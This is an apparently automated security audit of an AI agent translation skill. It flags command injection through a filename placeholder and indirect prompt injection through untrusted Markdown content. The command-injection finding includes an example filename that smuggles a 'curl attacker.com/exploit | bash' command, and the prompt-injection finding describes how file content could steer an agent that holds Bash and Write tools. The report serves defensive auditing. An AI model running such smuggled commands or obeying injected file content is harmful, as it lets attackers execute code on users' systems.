markdown-segment-translator
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill instructions direct the agent to execute a shell command using a template: python3 ... --input [输入文件]. This creates a command injection vulnerability because the [输入文件] (input file) placeholder is populated with user-provided input. If a user provides a filename containing shell metacharacters (e.g., file.md; curl attacker.com/exploit | bash), the agent may execute arbitrary code on the host system.
- PROMPT_INJECTION (LOW): The skill is vulnerable to Indirect Prompt Injection (Category 8). It reads content from untrusted Markdown files and interpolates it directly into a prompt for translation via the [段落内容] (paragraph content) placeholder, without delimiters or sanitization. This allows a malicious file to influence the agent's behavior during the translation process.
  - Ingestion points: External file content is read via the Read tool and processed by segment_tool.py.
  - Boundary markers: Absent. There are no markers or instructions to help the agent distinguish between its instructions and the data to be translated.
  - Capability inventory: The skill has access to the Bash, Read, and Write tools, providing a broad surface for post-exploitation actions if an injection is successful.
  - Sanitization: No input validation or escaping is specified for the file content or the filename parameter.
Recommendations
- AI detected serious security threats
Audit Metadata